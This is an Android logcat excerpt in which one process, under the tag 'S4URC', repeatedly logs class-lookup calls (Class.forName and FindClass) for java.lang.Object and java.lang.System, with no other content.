D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
